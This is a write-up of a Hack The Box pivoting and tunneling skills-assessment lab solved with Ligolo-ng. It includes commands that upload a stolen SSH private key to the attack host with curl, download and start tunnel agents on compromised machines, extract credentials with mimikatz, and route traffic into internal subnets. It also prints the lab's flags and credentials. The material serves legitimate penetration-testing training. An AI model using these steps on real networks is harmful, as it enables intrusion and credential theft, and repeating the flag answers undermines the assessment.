Pivoting, Tunneling, and Port Forwarding - Hack The Box - SKILLS ASSESSMENT

 This is a write-up about the skills assessment lab Pivoting, Tunneling, and Port Forwarding module from Hack The box. 

DISCLAIMER: This post is sharing the same tactics shared in the module but using a single tool called Ligolo-ng. I found it interesting and decided to learn how to use it, apart from the tools and techniques shared in the module. 

The lab contains the following description:


A team member started a Penetration Test against the Inlanefreight environment but was moved to another project at the last minute. Luckily for us, they left a web shell in place for us to get back into the network so we can pick up where they left off. We need to leverage the web shell to continue enumerating the hosts, identifying common services, and using those services/protocols to pivot into the internal networks of Inlanefreight. Our detailed objectives are below:


- Start from external (Pwnbox or your own VM) and access the first system via the web shell left in place.

- Use the web shell access to enumerate and pivot to an internal host.

- Continue enumeration and pivoting until you reach the Inlanefreight Domain Controller and capture the associated flag.

- Use any data, credentials, scripts, or other information within the environment to enable your pivoting attempts.

- Grab any/all flags that can be found.

Connection Info



You will find the web shell pictured below when you browse to support.inlanefreight.local or the target IP above.

As the content is long, I divided the same based on the questions that needs to be answered in the skill assessment.


1 - 
Once on the webserver, enumerate the host for credentials that can be used to start a pivot or tunnel to another host in the network. In what user's directory can you find the credentials? Submit the name of the user as the answer.

Accessing the web-shell, I could easily identify that the answer is webadmin. as per the ssh-key identified.

webshell navigation

2 - Submit the credentials found in the user's home directory. (Format: user:password)

The answer was available in the file for-admin-eyes-only, which was mlefay:Plain Human work!

credentials in text file

3 - Enumerate the internal network and discover another active host. Submit the IP address of that host as the answer.

To answer this question and the following ones, I downloaded the ssh key to the attack host and connected via ssh to the machine.

The steps to achieve this were the following:

 - Start a python uploadserver on the attack host: python3 -m uploadserver

 - In the Webshell, perform the upload request with the id_rsa file: curl -X POST https://localhost:8000/upload --insecure -F files=@id_rsa

 - On the attack host, modify the id_rsa file permission and connect to the Foothold machine via SSH: chmod 600 id_rsa

ssh -i id_rsa webadmin@

Finally, after connecting to the machine via SSH, I found it had the IP in the subnet. I then performed a ping sweep to find the target host.

Ping sweep:

ping sweep


4 - Use the information you gathered to pivot to the discovered host. Submit the contents of C:\Flag.txt as the answer.

At this stage, the aforementioned tool, ligolo-ng, comes into play.

 I chose this tool due to its straightforward approach to handling double or even triple pivoting. It also simplifies port forwarding management and, importantly, offers an alternative approach that doesn’t rely on SOCKS.

Ligolo-ng - setup

The setup is relatively simple, starting with downloading the proxy and the agent files from Github. I also downloaded the windows agent.exe to be used on an upcoming windows machine.

- On the attack host, setup the tun interface:

sudo ip tuntap add user kali mode tun ligolo
sudo ip link set ligolo up

- Start the proxy:

./proxy -selfcert -laddr

ligolo-ng proxy

With the proxy running, the second step is to start the agent on the foothold machine(pivot1). To accomplish that, I started a python http.server and downloaded the agent file onto the foothold machine.

Finally, I added executable permissions to the file and started the agent:

agent 1 started

On the attack host, a log will indicate that the agent has joined. We need to select the session by typing session.

agent joined + session

In the terminal, we can run ifconfig to identify the subnets:

identifying subnets

To pivot from the attack host to the foothold’s subnet, we need to add the desired subnet to the attack host’s IP route using the following command:

sudo ip route add dev ligolo

Finally, run start in the proxy terminal to initiate the tunnel:

tunnel 1 started
With the setup completed, I was able to access the host directly from the attack host and without any SOCKS configuration:

rdp through pivot host

After accessing the machine using the mlefay credentials, I managed to answer the question 4.
answer: S1ngl3-Piv07-3@sy-Day

flag - q4

5 - In previous pentests against Inlanefreight, we have seen that they have a bad habit of utilizing accounts with services in a way that exposes the users credentials and the network as a whole. What user is vulnerable?

To answer the question, I explored the machine and found that mlefay had local admin rights, allowing me to dump LSASS or run Mimikatz to get credentials. I also discovered a DHCP service configured with a service user named vfrank, which was the answer to question 5.

However, I still needed vfrank’s credentials to proceed...

answer: vfrank

6 - For your next hop enumerate the networks and then utilize a common remote access solution to pivot. Submit the C:\Flag.txt located on the workstation.

While enumerating the network during the RDP session, I discovered a second subnet,, with the IP assigned to the current machine.

second subnet

Also, performing a ping sweep, I identified two hosts in this subnet:,

At this point, things were becoming more complex.

I was able to access the Windows machine via pivoting, as shown in the image below.

pivoting diagram 1

However, it turned out that the Windows machine at the bottom needed to be configured as the second pivot host to reach the subnet. I was able to do this easily thanks to ligolo-ng.

Double pivoting setup

To set up the Windows machine as a second pivot, I had to transfer the agent.exe to the machine. Thanks to ligolo-ng, I was able to set up a port-forward and transfer the agent.exe directly from the attack host to the Windows machine, as shown below.

- On the attack host, in the proxy terminal, I added the listener to forward the traffic from port 9001 on the pivot1 host to the attack host using the following command: listener_add --addr --to --tcp

listener 9001

- On the attack host, I started a python http.server on port 9001 to transfer the agent.exe using the following command: python3 -m http.server 9001

- On the Windows machine, I performed an HTTP request to download the agent.exe. The request was directed to the pivot1 host, which then port-forwarded it to the attack host using the following command: Invoke-WebRequest -OutFile agent.exe

transfer file - port forwarding

- Before starting the agent.exe, there are some configuration steps required on the attack host side:

A second port-forward is needed to receive the agent connection on the attack host, as the Windows machine can only see the pivot1 host. This can be done with the following command:

listener_add --addr  --to  --tcp

second port-forward

A second TUN interface should be added on the attack host to reach the Windows machine. This can be done using the following commands:

sudo ip tuntap add user kali mode tun ligolo2

sudo ip link set ligolo2 up

- Returning to the Windows machine, I started the agent.exe and pointed it to the pivot1 host using the following command:

.\agent.exe -connect -ignore-cert

On the attack host, a new agent will join and be displayed in the proxy terminal:

agent2 joined
Run the session command and select the second one:

session 2 - selected
By running the ifconfig command, we can see the new subnet subnet
To access the subnet and complete the double pivoting, we need to start the tunnel while pointing to the second ligolo TUN interface using the following command: start --tun ligolo2

second tunnel
Last but not least, add the IP route to the new subnet on the attack host using another terminal:

sudo ip route add dev ligolo2

At this point, the double pivoting is complete. Let’s return to question 6 - For your next hop enumerate the networks and then utilize a common remote access solution to pivot. Submit the C:\Flag.txt located on the workstation.

Before testing the machines and from the newly mapped subnet achieved through double pivoting, I needed to find vfrank’s password. To do this, I downloaded mimikatz.exe on the Windows host (pivot 2) and successfully extracted vfrank’s password.

vfrank password

With vfrank’s credentials in hand, I successfully connected to the machine and captured the flag for question 6.

xfreerdp /u:vfrank  /v: /d:inlanefreight.local

answer: N3tw0rk-H0pp1ng-f0R-FuN

7 - Submit the contents of C:\Flag.txt located on the Domain Controller.

The current machine had a network mapping to the domain controller (DC):

DC access

By accessing the network location, I was able to find the final flag:

last flag

answer: 3nd-0xf-Th3-R@inbow!

At this point, the skill assessment was completed, but a few questions remained as per current pivoting diagram is illustrated in the image below:

The first question was about the machine Could I pivot to this machine? I spent some time investigating it and discovered that it was a linux machine accessible through SSH. However, I was unable to connect to it from the pivot2 host or anywhere using the credentials available.

top1000 port scan

I also tested the other ports, resulting in no success.

The second question concerned the subnet, which was found on the Windows 10 machine. Could I access the domain controller (DC) via RDP and potentially pivot to another machine or subnet?
I setup ligolo-ng agent on the windows machine as the third pivot and scanned the DC, resulting in no direct access option other than the smb share. I performed some tests over the open ports without new results.
DC top1000 scan port

Quite a long write up, isn't it? Thanks for reading it!